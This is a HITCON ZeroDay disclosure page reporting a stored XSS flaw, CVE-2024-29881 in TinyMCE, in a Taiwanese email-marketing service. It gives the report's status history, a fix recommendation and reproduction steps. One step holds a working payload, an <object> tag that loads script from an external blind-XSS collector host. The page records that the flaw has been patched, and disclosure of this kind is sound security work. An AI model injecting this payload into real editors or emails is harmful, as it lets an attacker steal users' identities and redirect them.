飛信資訊股份有限公司發送 Email 服務，使用的 TinyMCE HTML Editor 有已知 CVE-2024-29881 漏洞

Vulnerability Overview

ZDID: ZD-2025-00568
發信 Vendor: 飛信資訊股份有限公司
Title: 飛信資訊股份有限公司發送 Email 服務，使用的 TinyMCE HTML Editor 有已知 CVE-2024-29881 漏洞
Introduction: 發送 Email 服務，使用的 TinyMCE HTML Editor 有已知 CVE-2024-29881 漏洞

處理狀態

目前狀態

公開

Last Update : 2025/07/27

新提交
已審核
已通報
已修補
已複測
公開

處理歷程

2025/06/12 17:08:32 : 新提交 (由 yusheng 更新此狀態)
2025/06/13 14:54:40 : 審核完成 (由 HITCON ZeroDay 服務團隊更新此狀態)
2025/06/20 16:10:41 : 通報未回應 (由 HITCON ZeroDay 服務團隊更新此狀態)
2025/06/20 16:10:41 : 審核完成 (由 HITCON ZeroDay 服務團隊更新此狀態)
2025/06/20 16:10:41 : 通報未回應 (由 HITCON ZeroDay 服務團隊更新此狀態)
2025/06/20 17:57:43 : 修補中 (由組織帳號更新此狀態)
2025/07/23 11:24:24 : 複測申請中 (由組織帳號更新此狀態)
2025/07/23 11:45:37 : 確認已修補 (由 yusheng 更新此狀態)
2025/07/27 03:00:11 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

ZDID：ZD-2025-00568
通報者：cat1528985 (yusheng)
風險：中
類型：預存式跨站腳本攻擊 (Stored Cross-Site Scripting)

參考資料

攻擊者可經由該漏洞竊取使用者身份，或進行掛碼、轉址等攻擊行為。

漏洞說明： OWASP - Cross-site Scripting (XSS)
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

防護原則：
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

XSS 防禦繞過方式：
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

(本欄位資訊由系統根據漏洞類別自動產生，做為漏洞參考資料。)

敘述

重現漏洞方式：

免費註冊飛信資訊服務 https://www.flydove.net/free
到飛信資訊後台登入 https://console2.flydove.net/login
左側選單 > 電子郵件發送 > HTML 編輯器 https://console2.flydove.net/edm
按照已知 CVE-2024-29881 的描述 https://github.com/tinymce/tinymce/security/advisories/GHSA-5359-pvf2-pw78
在HTML 編輯器插入 <object data="https://blind-xss-collector.vercel.app/script.svg"></object>
其中，
插入的瞬間就會執行程式碼
發送成功後，可透過網頁式電子報瀏覽發送的 EDM，點進去網址也會執行程式碼

POC 影片：https://drive.google.com/file/d/1w1B0w9Am1_zQCBHm3JnGZVlhSs9ttD3h/view?usp=sharing

修補建議

TinyMCE HTML Editor 更新到最新版

擷圖

留言討論

聯絡組織

發送私人訊息

您也可以透過私人訊息的方式與組織聯繫，討論有關於這個漏洞的相關資訊。

飛信資訊股份有限公司發送 Email 服務，使用的 TinyMCE HTML Editor 有已知 CVE-2024-29881 漏洞 - HITCON ZeroDay

Vulnerability Detail Report